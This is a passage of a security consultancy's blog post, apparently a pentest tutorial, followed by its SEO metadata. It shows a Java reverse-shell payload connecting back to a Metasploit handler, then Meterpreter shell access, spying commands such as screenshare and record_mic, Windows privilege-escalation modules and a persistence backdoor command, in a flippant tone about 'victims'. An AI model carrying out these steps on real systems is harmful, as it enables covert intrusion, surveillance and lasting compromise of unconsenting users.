\/>\nkali\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 63963\u00a0 0.0\u00a0 0.0\u00a0\u00a0 6112\u00a0\u00a0 644 pts\/2\u00a0\u00a0\u00a0 S+\u00a0\u00a0 22:54\u00a0\u00a0 0:00 grep &#8211;color=auto runme<\/p>\n<p>Seems like nothing happened right? Or did it?<\/p>\n<p>kali@kali:~$ <strong>lsof -i :4444<\/strong><br \/>\nCOMMAND\u00a0\u00a0 PID USER\u00a0\u00a0 FD\u00a0\u00a0 TYPE DEVICE SIZE\/OFF NODE NAME<br \/>\nruby\u00a0\u00a0\u00a0 63774 kali\u00a0\u00a0\u00a0 8u\u00a0 IPv4 170341\u00a0\u00a0\u00a0\u00a0\u00a0 0t0\u00a0 TCP 192.168.1.2:4444-&gt;192.168.1.2:56226 (ESTABLISHED)<br \/>\njava\u00a0\u00a0\u00a0 63940 kali\u00a0\u00a0\u00a0 7u\u00a0 IPv6 170614\u00a0\u00a0\u00a0\u00a0\u00a0 0t0\u00a0 TCP 192.168.1.2:56226-&gt;192.168.1.2:4444 (ESTABLISHED)<\/p>\n<p>Then, check out the Metasploit console.<\/p>\n<p>[*] Started reverse TCP handler on 192.168.1.2:4444<br \/>\n[*] Sending stage (53944 bytes) to 192.168.1.2<br \/>\n<strong>[*] Meterpreter session 1 opened (192.168.1.2:4444 -&gt; 192.168.1.2:56226) at 2020-10-15 22:53:28 +0100<\/strong>meterpreter &gt;<\/p>\n<p>This is the crazy part\u2026<\/p>\n<p>meterpreter &gt; <strong>shell<\/strong><br \/>\nProcess 1 created.<br \/>\nChannel 1 created.<strong>ls -la ~\/runme.jar<\/strong><br \/>\n-rwxr-xr-x 1 kali kali 5307 Oct 15 22:33 \/home\/kali\/runme.jar<\/p>\n<p>&nbsp;<\/p>\n<p>Although prompt is not seen, you will have a shell back to the victim system and will locate the \u201c<strong>runme.jar<\/strong>\u201d file. Now, try creating a file or directory, and you will see it created on the victim system.<\/p>\n<p>&nbsp;<\/p>\n<p>You can terminate the shell by pressing Ctrl+C.<\/p>\n<p>&nbsp;<\/p>\n<p>Terminate channel 1? [y\/N]\u00a0 <strong>y<\/strong><br \/>\nmeterpreter &gt;<\/p>\n<p>Try to \u201cbackground\u201d the meterpreter session.<\/p>\n<p>meterpreter &gt; <strong>background<\/strong><\/p>\n<p>The current sessions and re-access of any sessions can be shown as mentioned below.<\/p>\n<p>msf6 exploit(multi\/handler) &gt; <strong>show sessions<\/strong>Active sessions<br \/>\n===============Id\u00a0 Name\u00a0 Type\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 Information\u00a0 Connection<br \/>\n&#8212;\u00a0 &#8212;-\u00a0 &#8212;-\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 &#8212;&#8212;&#8212;&#8211;\u00a0 &#8212;&#8212;&#8212;-<br \/>\n1\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 meterpreter java\/linux\u00a0 kali @ kali\u00a0 192.168.1.2:4444 -&gt; 192.168.1.2:56226 (192.168.1.2)msf5 exploit(multi\/handler) &gt; <strong>sessions -i 1<\/strong><br \/>\n[*] Starting interaction with 1&#8230;meterpreter &gt;<\/p>\n<p>&nbsp;<\/p>\n<p>Thinking about what a hacker can do with your system with reverse shell can give you nightmares. They can easily access your web camera, microphone, take access to your system and view your private files and much more. This is the reason why it is advised to open software from trustworthy sources and to ensure that your system is up-to-date with anti-virus installed in it.<\/p>\n<p>&nbsp;<\/p>\n<p>Here are just a few options\u2026<\/p>\n<p>meterpreter &gt; <strong>help<\/strong>Stdapi: Networking Commands<br \/>\n===========================Command\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 Description<br \/>\n&#8212;&#8212;-\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 &#8212;&#8212;&#8212;&#8211;<br \/>\nifconfig\u00a0\u00a0\u00a0\u00a0\u00a0 Display interfaces<br \/>\nipconfig\u00a0\u00a0\u00a0\u00a0\u00a0 Display interfaces<br \/>\nportfwd\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 Forward a local port to a remote service<br \/>\nroute\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 View and modify the routing tableStdapi: System Commands<br \/>\n=======================Command\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 Description<br \/>\n&#8212;&#8212;-\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 &#8212;&#8212;&#8212;&#8211;<br \/>\nexecute\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 Execute a command<br \/>\ngetenv\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 Get one or more environment variable values<br \/>\ngetuid\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 Get the user that the server is running as<br \/>\nlocaltime\u00a0\u00a0\u00a0\u00a0 Displays the target system&#8217;s local date and time<br \/>\npgrep\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 Filter processes by name<br \/>\nps\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 List running processes<br \/>\nshell\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 Drop into a system command shell<br \/>\nsysinfo\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 Gets information about the remote system, such as OSStdapi: User interface Commands<br \/>\n===============================Command\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 Description<br \/>\n&#8212;&#8212;-\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 &#8212;&#8212;&#8212;&#8211;<br \/>\nkeyevent\u00a0\u00a0\u00a0\u00a0\u00a0 Send key events<br \/>\nmouse\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 Send mouse events<br \/>\nscreenshare\u00a0\u00a0 Watch the remote user&#8217;s desktop in real time<br \/>\nscreenshot\u00a0\u00a0\u00a0 Grab a screenshot of the interactive desktopStdapi: Webcam Commands<br \/>\n=======================Command\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 Description<br \/>\n&#8212;&#8212;-\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 &#8212;&#8212;&#8212;&#8211;<br \/>\nrecord_mic\u00a0\u00a0\u00a0 Record audio from the default microphone for X secondsStdapi: Audio Output Commands<br \/>\n=============================Command\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 Description<br \/>\n&#8212;&#8212;-\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 &#8212;&#8212;&#8212;&#8211;<br \/>\nplay\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 play a waveform audio file (.wav) on the target system<\/p>\n<p>&nbsp;<\/p>\n<p>The list of options depends on what system you are accessing. If you are using the Kali Linux virtual machine, then the webcam options are missing, but if you were accessing a Windows host, for example, you would see them there.<\/p>\n<p>&nbsp;<\/p>\n<p>The exploit will run as the user that ran it. You will need to escalate your services to take full access to your system.<\/p>\n<p>&nbsp;<\/p>\n<p>In case, you are targeting Windows, you will have multiple options\u2026<\/p>\n<p>msf6 exploit(multi\/handler) &gt; <strong>use post\/windows\/escalate\/<\/strong><br \/>\nuse post\/windows\/escalate\/droplnk\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 use post\/windows\/escalate\/golden_ticket\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 use post\/windows\/escalate\/screen_unlock<br \/>\nuse post\/windows\/escalate\/getsystem\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 use post\/windows\/escalate\/ms10_073_kbdlayout\u00a0 use post\/windows\/escalate\/unmarshal_cmd_exec<\/p>\n<p>You could also seek permission from the victim to access the system.<\/p>\n<p>msf6 exploit(multi\/handler) &gt; <strong>use exploit\/windows\/local\/ask<\/strong><\/p>\n<p>&nbsp;<\/p>\n<p>Linux-based systems don\u2019t usually have \u201c<em>fun<\/em>\u201d options. In case, Windows user is the target, you could have a gala time on their system.<\/p>\n<p>&nbsp;<\/p>\n<p>These reverse shells are not persistent. This means if the system reboots, it won\u2019t be running and you need to seek the victim\u2019s permission to run it again.<\/p>\n<p>&nbsp;<\/p>\n<p>meterpreter &gt; <strong>run persistence -h<\/strong>[!] Meterpreter scripts are deprecated. Try exploit\/windows\/local\/persistence.<br \/>\n[!] Example: run exploit\/windows\/local\/persistence OPTION=value [&#8230;]<br \/>\nMeterpreter Script for creating a persistent backdoor on a target host.OPTIONS:-A\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 Automatically start a matching exploit\/multi\/handler to connect to the agent<br \/>\n-L &lt;opt&gt;\u00a0 Location in target host to write payload to, if none %TEMP% will be used.<br \/>\n-P &lt;opt&gt;\u00a0 Payload to use, default is windows\/meterpreter\/reverse_tcp.<br \/>\n-S\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 Automatically start the agent on boot as a service (with SYSTEM privileges)<br \/>\n-T &lt;opt&gt;\u00a0 Alternate executable template to use<br \/>\n-U\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 Automatically start the agent when the User logs on<br \/>\n-X\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 Automatically start the agent when the system boots<br \/>\n-h\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 This help menu<br \/>\n-i &lt;opt&gt;\u00a0 The interval in seconds between each connection attempt<br \/>\n-p &lt;opt&gt;\u00a0 The port on which the system running Metasploit is listening<br \/>\n-r &lt;opt&gt;\u00a0 The IP of the system running Metasploit listening for the connect back<\/p>\n<p>As an example, for the system with Windows OS to reverse shell persistent, you have to run this.<\/p>\n<p>meterpreter &gt; <strong>run exploit\/windows\/local\/persistence OPTION=X<\/strong><\/p>\n<p>&nbsp;<\/p>\n<p>You can also browse our website to learn about other <a href=\"https:\/\/www.varutra.com\/category\/network-pentesting\/amp\/\">pentest<\/a> attacks like <a href=\"https:\/\/www.varutra.com\/aws-pentesting-part-1\/\">AWS Pentesting<\/a>, <a href=\"https:\/\/www.varutra.com\/port-forwarding-pivoting-and-tunneling\/amp\/\">Port Forwarding<\/a> and more on our <a href=\"https:\/\/www.varutra.com\/blogs\/\">blog<\/a> section.<\/p>\n<p>&nbsp;<\/p>\n<p>Author,<\/p>\n<p><strong>Sachin Kumar<\/strong><\/p>\n<p>Attack &amp; Pentest Team,<\/p>\n<p>Varutra Consulting<\/p>","protected":false},"excerpt":{"rendered":"<p>Metasploit Framework is a powerful open-source penetration testing framework. You get to know all the information about penetration testing, IDS signature, and software vulnerabilities. It&#8230;<\/p>\n","protected":false},"author":4,"featured_media":17996,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"om_disable_all_campaigns":false,"inline_featured_image":false,"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"footnotes":""},"categories":[261,278,274],"tags":[566,567,568,102],"aioseo_notices":[],"aioseo_head":"\n\t\t<!-- All in One SEO Pro 4.6.3 - aioseo.com -->\n\t\t<meta name=\"description\" content=\"Metasploit Framework is a penetration testing tool that is most commonly used. You can gather information, gain access, maintain persistence, evade detection.\" \/>\n\t\t<meta name=\"robots\" content=\"max-image-preview:large\" \/>\n\t\t<link rel=\"canonical\" href=\"https:\/\/www.varutra.com\/varutravrt3\/penetration-testing-using-metasploit-framework\/\" \/>\n\t\t<meta name=\"generator\" content=\"All in One SEO Pro (AIOSEO) 4.6.3\" \/>\n\t\t<meta property=\"og:locale\" content=\"en_US\" \/>\n\t\t<meta property=\"og:site_name\" content=\"Varutra Consulting\" \/>\n\t\t<meta property=\"og:type\" content=\"article\" \/>\n\t\t<meta property=\"og:title\" content=\"Metasploit Framework | Penetration Testing with Metasploit\" \/>\n\t\t<meta property=\"og:description\" content=\"Metasploit Framework is a penetration testing tool that is most commonly used. You can gather information, gain access, maintain persistence, evade detection.\" \/>\n\t\t<meta property=\"og:url\" content=\"https:\/\/www.varutra.com\/varutravrt3\/penetration-testing-using-metasploit-framework\/\" \/>\n\t\t<meta property=\"article:tag\" content=\"metasploit\" \/>\n\t\t<meta property=\"article:tag\" content=\"metasploit tool\" \/>\n\t\t<meta property=\"article:tag\" content=\"open-source framework\" \/>\n\t\t<meta property=\"article:tag\" content=\"penetration testing\" \/>\n\t\t<meta property=\"article:published_time\" content=\"2021-11-25T06:46:14+00:00\" \/>\n\t\t<meta property=\"article:modified_time\" content=\"2022-12-02T05:56:15+00:00\" \/>\n\t\t<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n\t\t<meta name=\"twitter:title\" content=\"Metasploit Framework | Penetration Testing with Metasploit\" \/>\n\t\t<meta name=\"twitter:description\" content=\"Metasploit Framework is a penetration testing tool that is most commonly used. You can gather information, gain access, maintain persistence, evade detection.\" \/>\n\t\t<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t\t<meta name=\"twitter:data1\" content=\"kalpblogger\" \/>\n\t\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t\t<meta name=\"twitter:data2\" content=\"12 minutes\" \/>\n\t\t<script type=\"application\/ld+json\" class=\"aioseo-schema\">\n\t\t\t{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/www.varutra.com\\\/varutravrt3\\\/penetration-testing-using-metasploit-framework\\\/#article\",\"name\":\"Metasploit Framework | Penetration Testing with Metasploit\",\"headline\":\"Penetration Testing Using Metasploit Framework\",\"author\":{\"@id\":\"https:\\\/\\\/www.varutra.com\\\/varutravrt3\\\/author\\\/kalpblogger\\\/#author\"},\"publisher\":{\"@id\":\"https:\\\/\\\/www.varutra.com\\\/varutravrt3\\\/#organization\"},\"image\":{\"@type\":\"ImageObject\",\"url\":\"https:\\\/\\\/www.varutra.com\\\/varutravrt3\\\/wp-content\\\/uploads\\\/2021\\\/11\\\/Penetration-Testing-Using-Metasploit-Framework.png\",\"width\":1200,\"height\":627,\"caption\":\"Penetration Testing Using Metasploit Framework\"},\"datePublished\":\"2021-11-25T12:16:14+05:30\",\"dateModified\":\"2022-12-02T11:26:15+05:30\",\"inLanguage\":\"en-US\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/www.varutra.com\\\/varutravrt3\\\/penetration-testing-using-metasploit-framework\\\/#webpage\"},\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.varutra.com\\\/varutravrt3\\\/penetration-testing-using-metasploit-framework\\\/#webpage\"},\"articleSection\":\"Ethical Hacking, Network Pentesting, Security Hardening, Metasploit, Metasploit Tool, open-source framework, Penetration Testing\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/www.varutra.com\\\/varutravrt3\\\/penetration-testing-using-metasploit-framework\\\/#breadcrumblist\",\"itemListElement\":[{\"@type\":\"ListItem\",\"@id\":\"https:\\\/\\\/www.varutra.com\\\/varutravrt3\\\/#listItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/www.varutra.com\\\/varutravrt3\\\/\",\"nextItem\":\"https:\\\/\\\/www.varutra.com\\\/varutravrt3\\\/penetration-testing-using-metasploit-framework\\\/#listItem\"},{\"@type\":\"ListItem\",\"@id\":\"https:\\\/\\\/www.varutra.com\\\/varutravrt3\\\/penetration-testing-using-metasploit-framework\\\/#listItem\",\"position\":2,\"name\":\"Penetration Testing Using Metasploit Framework\",\"previousItem\":\"https:\\\/\\\/www.varutra.com\\\/varutravrt3\\\/#listItem\"}]},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/www.varutra.com\\\/varutravrt3\\\/#organization\",\"name\":\"Varutra\",\"url\":\"https:\\\/\\\/www.varutra.com\\\/varutravrt3\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"url\":\"https:\\\/\\\/www.varutra.com\\\/wp-content\\\/uploads\\\/2021\\\/11\\\/Varutra-Found-e1612984024606.jpg\",\"@id\":\"https:\\\/\\\/www.varutra.com\\\/varutravrt3\\\/penetration-testing-using-metasploit-framework\\\/#organizationLogo\"},\"image\":{\"@id\":\"https:\\\/\\\/www.varutra.com\\\/varutravrt3\\\/penetration-testing-using-metasploit-framework\\\/#organizationLogo\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/www.varutra.com\\\/varutravrt3\\\/author\\\/kalpblogger\\\/#author\",\"url\":\"https:\\\/\\\/www.varutra.com\\\/varutravrt3\\\/author\\\/kalpblogger\\\/\",\"name\":\"kalpblogger\",\"image\":{\"@type\":\"ImageObject\",\"@id\":\"https:\\\/\\\/www.varutra.com\\\/varutravrt3\\\/penetration-testing-using-metasploit-framework\\\/#authorImage\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/5e96a9b330da7c941c1e39217a2fbe38?s=96&d=mm&r=g\",\"width\":96,\"height\":96,\"caption\":\"kalpblogger\"}},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/www.varutra.com\\\/varutravrt3\\\/penetration-testing-using-metasploit-framework\\\/#webpage\",\"url\":\"https:\\\/\\\/www.varutra.com\\\/varutravrt3\\\/penetration-testing-using-metasploit-framework\\\/\",\"name\":\"Metasploit Framework | Penetration Testing with Metasploit\",\"description\":\"Metasploit Framework is a penetration testing tool that is most commonly used. You can gather information, gain access, maintain persistence, evade detection.\",\"inLanguage\":\"en-US\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.varutra.com\\\/varutravrt3\\\/#website\"},\"breadcrumb\":{\"@id\":\"https:\\\/\\\/www.varutra.com\\\/varutravrt3\\\/penetration-testing-using-metasploit-framework\\\/#breadcrumblist\"},\"author\":{\"@id\":\"https:\\\/\\\/www.varutra.com\\\/varutravrt3\\\/author\\\/kalpblogger\\\/#author\"},\"creator\":{\"@id\":\"https:\\\/\\\/www.varutra.com\\\/varutravrt3\\\/author\\\/kalpblogger\\\/#author\"},\"image\":{\"@type\":\"ImageObject\",\"url\":\"https:\\\/\\\/www.varutra.com\\\/varutravrt3\\\/wp-content\\\/uploads\\\/2021\\\/11\\\/Penetration-Testing-Using-Metasploit-Framework.png\",\"@id\":\"https:\\\/\\\/www.varutra.com\\\/varutravrt3\\\/penetration-testing-using-metasploit-framework\\\/#mainImage\",\"width\":1200,\"height\":627,\"caption\":\"Penetration Testing Using Metasploit Framework\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/www.varutra.com\\\/varutravrt3\\\/penetration-testing-using-metasploit-framework\\\/#mainImage\"},\"datePublished\":\"2021-11-25T12:16:14+05:30\",\"dateModified\":\"2022-12-02T11:26:15+05:30\"},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/www.varutra.com\\\/varutravrt3\\\/#website\",\"url\":\"https:\\\/\\\/www.varutra.com\\\/varutravrt3\\\/\",\"name\":\"Varutra Consulting\",\"description\":\"Secure your digital world with our Cybersecurity services.\",\"inLanguage\":\"en-US\",\"publisher\":{\"@id\":\"https:\\\/\\\/www.varutra.com\\\/varutravrt3\\\/#organization\"}}]}\n\t\t<\/script>\n\t\t<!-- All in One SEO Pro -->\r\n\t\t<title>Metasploit Framework | Penetration Testing with Metasploit<\/title>\n\n","aioseo_head_json":{"title":"Metasploit Framework | Penetration Testing with Metasploit","description":"Metasploit Framework is a penetration testing tool that is most commonly used. You can gather information, gain access, maintain persistence, evade detection.","canonical_url":"https:\/\/www.varutra.com\/varutravrt3\/penetration-testing-using-metasploit-framework\/","robots":"max-image-preview:large","keywords":"","webmasterTools":{"miscellaneous":""},"og:locale":"en_US","og:site_name":"Varutra Consulting","og:type":"article","og:title":"Metasploit Framework | Penetration Testing with Metasploit","og:description":"Metasploit Framework is a penetration testing tool that is most commonly used. You can gather information, gain access, maintain persistence, evade detection.","og:url":"https:\/\/www.varutra.com\/varutravrt3\/penetration-testing-using-metasploit-framework\/","article:tag":["metasploit","metasploit tool","open-source framework","penetration testing"],"article:published_time":"2021-11-25T06:46:14+00:00","article:modified_time":"2022-12-02T05:56:15+00:00","twitter:card":"summary_large_image","twitter:title":"Metasploit Framework | Penetration Testing with Metasploit","twitter:description":"Metasploit Framework is a penetration testing tool that is most commonly used. You can gather information, gain access, maintain persistence, evade detection.","twitter:label1":"Written by","twitter:data1":"kalpblogger","twitter:label2":"Est. reading time","twitter:data2":"12 minutes","schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/www.varutra.com\/varutravrt3\/penetration-testing-using-metasploit-framework\/#article","name":"Metasploit Framework | Penetration Testing with Metasploit","headline":"Penetration Testing Using Metasploit Framework","author":{"@id":"https:\/\/www.varutra.com\/varutravrt3\/author\/kalpblogger\/#author"},"publisher":{"@id":"https:\/\/www.varutra.com\/varutravrt3\/#organization"},"image":{"@type":"ImageObject","url":"https:\/\/www.varutra.com\/varutravrt3\/wp-content\/uploads\/2021\/11\/Penetration-Testing-Using-Metasploit-Framework.png","width":1200,"height":627,"caption":"Penetration Testing Using Metasploit Framework"},"datePublished":"2021-11-25T12:16:14+05:30","dateModified":"2022-12-02T11:26:15+05:30","inLanguage":"en-US","mainEntityOfPage":{"@id":"https:\/\/www.varutra.com\/varutravrt3\/penetration-testing-using-metasploit-framework\/#webpage"},"isPartOf":{"@id":"https:\/\/www.varutra.com\/varutravrt3\/penetration-testing-using-metasploit-framework\/#webpage"},"articleSection":"Ethical Hacking, Network Pentesting, Security Hardening, Metasploit, Metasploit Tool, open-source framework, Penetration Testing"},{"@type":"BreadcrumbList","@id":"https:\/\/www.varutra.com\/varutravrt3\/penetration-testing-using-metasploit-framework\/#breadcrumblist","itemListElement":[{"@type":"ListItem","@id":"https:\/\/www.varutra.com\/varutravrt3\/#listItem","position":1,"name":"Home","item":"https:\/\/www.varutra.com\/varutravrt3\/","nextItem":"https:\/\/www.varutra.com\/varutravrt3\/penetration-testing-using-metasploit-framework\/#listItem"},{"@type":"ListItem","@id":"https:\/\/www.varutra.com\/varutravrt3\/penetration-testing-using-metasploit-framework\/#listItem","position":2,"name":"Penetration Testing Using Metasploit Framework","previousItem":"https:\/\/www.varutra.com\/varutravrt3\/#listItem"}]},{"@type":"Organization","@id":"https:\/\/www.varutra.com\/varutravrt3\/#organization","name":"Varutra","url":"https:\/\/www.varutra.com\/varutravrt3\/","logo":{"@type":"ImageObject","url":"https:\/\/www.varutra.com\/wp-content\/uploads\/2021\/11\/Varutra-Found-e1612984024606.jpg","@id":"https:\/\/www.varutra.com\/varutravrt3\/penetration-testing-using-metasploit-framework\/#organizationLogo"},"image":{"@id":"https:\/\/www.varutra.com\/varutravrt3\/penetration-testing-using-metasploit-framework\/#organizationLogo"}},{"@type":"Person","@id":"https:\/\/www.varutra.com\/varutravrt3\/author\/kalpblogger\/#author","url":"https:\/\/www.varutra.com\/varutravrt3\/author\/kalpblogger\/","name":"kalpblogger","image":{"@type":"ImageObject","@id":"https:\/\/www.varutra.com\/varutravrt3\/penetration-testing-using-metasploit-framework\/#authorImage","url":"https:\/\/secure.gravatar.com\/avatar\/5e96a9b330da7c941c1e39217a2fbe38?s=96&d=mm&r=g","width":96,"height":96,"caption":"kalpblogger"}},{"@type":"WebPage","@id":"https:\/\/www.varutra.com\/varutravrt3\/penetration-testing-using-metasploit-framework\/#webpage","url":"https:\/\/www.varutra.com\/varutravrt3\/penetration-testing-using-metasploit-framework\/","name":"Metasploit Framework | Penetration Testing with Metasploit","description":"Metasploit Framework is a penetration testing tool that is most commonly used. You can gather information, gain access, maintain persistence, evade detection.","inLanguage":"en-US","isPartOf":{"@id":"https:\/\/www.varutra.com\/varutravrt3\/#website"},"breadcrumb":{"@id":"https:\/\/www.varutra.com\/varutravrt3\/penetration-testing-using-metasploit-framework\/#breadcrumblist"},"author":{"@id":"https:\/\/www.varutra.com\/varutravrt3\/author\/kalpblogger\/#author"},"creator":{"@id":"https:\/\/www.varutra.com\/varutravrt3\/author\/kalpblogger\/#author"},"image":{"@type":"ImageObject","url":"https:\/\/www.varutra.com\/varutravrt3\/wp-content\/uploads\/2021\/11\/Penetration-Testing-Using-Metasploit-Framework.png","@id":"https:\/\/www.varutra.com\/varutravrt3\/penetration-testing-using-metasploit-framework\/#mainImage","width":1200,"height":627,"caption":"Penetration Testing Using Metasploit Framework"},"primaryImageOfPage":{"@id":"https:\/\/www.varutra.com\/varutravrt3\/penetration-testing-using-metasploit-framework\/#mainImage"},"datePublished":"2021-11-25T12:16:14+05:30","dateModified":"2022-12-02T11:26:15+05:30"},{"@type":"WebSite","@id":"https:\/\/www.varutra.com\/varutravrt3\/#website","url":"https:\/\/www.varutra.com\/varutravrt3\/","name":"Varutra Consulting","description":"Secure your digital world with our Cybersecurity services.","inLanguage":"en-US","publisher":{"@id":"https:\/\/www.varutra.com\/varutravrt3\/#organization"}}]}},"aioseo_meta_data":{"post_id":"17976","title":"Metasploit Framework | Penetration Testing with Metasploit","description":"Metasploit Framework is a penetration testing tool that is most commonly used. You can gather information, gain access, maintain persistence, evade detection.","keywords":[],"keyphrases":"{\"focus\":{\"keyphrase\":\"Metasploit \",\"score\":80,\"analysis\":{\"keyphraseInTitle\":{\"title\":\"Focus keyphrase in SEO title\",\"description\":\"Focus keyphrase found in SEO title.\",\"score\":9,\"maxScore\":9,\"error\":0},\"keyphraseInDescription\":{\"title\":\"Focus keyphrase in meta description\",\"description\":\"Focus keyphrase found in meta description.\",\"score\":9,\"maxScore\":9,\"error\":0},\"keyphraseLength\":{\"title\":\"Focus keyphrase length\",\"description\":\"Good job!\",\"score\":9,\"maxScore\":9,\"error\":0,\"length\":1},\"keyphraseInURL\":{\"title\":\"Focus keyphrase in URL\",\"description\":\"Focus keyphrase used in the URL.\",\"score\":5,\"maxScore\":5,\"error\":0},\"keyphraseInIntroduction\":{\"title\":\"Focus keyphrase in introduction\",\"description\":\"Your Focus keyphrase does not appear in the first paragraph. Make sure the topic is clear immediately.\",\"score\":3,\"maxScore\":9,\"error\":1},\"keyphraseInSubHeadings\":{\"title\":\"Focus keyphrase in Subheadings\",\"description\":\"Use more focus keyphrases in your H2 and H3 subheadings!\",\"score\":3,\"maxScore\":9,\"error\":1},\"keyphraseInImageAlt\":{\"title\":\"Focus keyphrase in image alt attributes\",\"description\":\"Focus keyphrase found in image alt attribute(s).\",\"score\":9,\"maxScore\":9,\"error\":0}}},\"additional\":[{\"keyphrase\":\"Metasploit Framework\",\"score\":83,\"analysis\":{\"keyphraseInDescription\":{\"title\":\"Keyphrase in meta description\",\"description\":\"Keyphrase found in meta description.\",\"score\":9,\"maxScore\":9,\"error\":0},\"keyphraseLength\":{\"title\":\"Keyphrase length\",\"description\":\"Good job!\",\"score\":9,\"maxScore\":9,\"error\":0,\"length\":2},\"keyphraseInIntroduction\":{\"title\":\"Keyphrase in introduction\",\"description\":\"Your Keyphrase does not appear in the first paragraph. Make sure the topic is clear immediately.\",\"score\":3,\"maxScore\":9,\"error\":1},\"keyphraseInImageAlt\":{\"title\":\"Keyphrase in image alt attributes\",\"description\":\"Keyphrase found in image alt attribute(s).\",\"score\":9,\"maxScore\":9,\"error\":0}}},{\"keyphrase\":\"Penetration Testing\",\"score\":67,\"analysis\":{\"keyphraseInDescription\":{\"title\":\"Keyphrase in meta description\",\"description\":\"Keyphrase found in meta description.\",\"score\":9,\"maxScore\":9,\"error\":0},\"keyphraseLength\":{\"title\":\"Keyphrase length\",\"description\":\"Good job!\",\"score\":9,\"maxScore\":9,\"error\":0,\"length\":2},\"keyphraseInIntroduction\":{\"title\":\"Keyphrase in introduction\",\"description\":\"Your Keyphrase does not appear in the first paragraph. Make sure the topic is clear immediately.\",\"score\":3,\"maxScore\":9,\"error\":1},\"keyphraseInImageAlt\":{\"title\":\"Keyphrase in image alt attributes\",\"description\":\"Keyphrase not found in image alt attribute(s). Add an image with your Keyphrase as alt text.\",\"score\":3,\"maxScore\":9,\"error\":1}}}]}","primary_term":null,"canonical_url":null,"og_title":null,"og_description":null,"og_object_type":"default","og_image_type":"default","og_image_url":null,"og_image_width":null,"og_image_height":null,"og_image_custom_url":null,"og_image_custom_fields":null,"og_video":"","og_custom_url":null,"og_article_section":null,"og_article_tags":[],"twitter_use_og":false,"twitter_card":"default","twitter_image_type":"default","twitter_image_url":null,"twitter_image_custom_url":null,"twitter_image_custom_fields":null,"twitter_title":null,"twitter_description":null,"schema":{"blockGraphs":[],"customGraphs":[],"default":{"data":{"Article":[],"Course":[],"Dataset":[],"FAQPage":[],"Movie":[],"Person":[],"Product":[],"Recipe":[],"Service":[],"SoftwareApplication":[],"WebPage":[]},"graphName":"","isEnabled":true},"graphs":[]},"schema_type":"default","schema_type_options":"{\"article\":{\"articleType\":\"BlogPosting\"},\"course\":{\"name\":\"\",\"description\":\"\",\"provider\":\"\"},\"faq\":{\"pages\":[]},\"product\":{\"reviews\":[]},\"recipe\":{\"ingredients\":[],\"instructions\":[],\"keywords\":[]},\"software\":{\"reviews\":[],\"operatingSystems\":[]},\"webPage\":{\"webPageType\":\"WebPage\"}}","pillar_content":false,"robots_default":true,"robots_noindex":false,"robots_noarchive":false,"robots_nosnippet":false,"robots_nofollow":false,"robots_noimageindex":false,"robots_noodp":false,"robots_notranslate":false,"robots_max_snippet":"-1","robots_max_videopreview":"-1","robots_max_imagepreview":"large","priority":null,"frequency":"default","local_seo":null,"limit_modified_date":false,"open_ai":null,"created":"2021-11-25 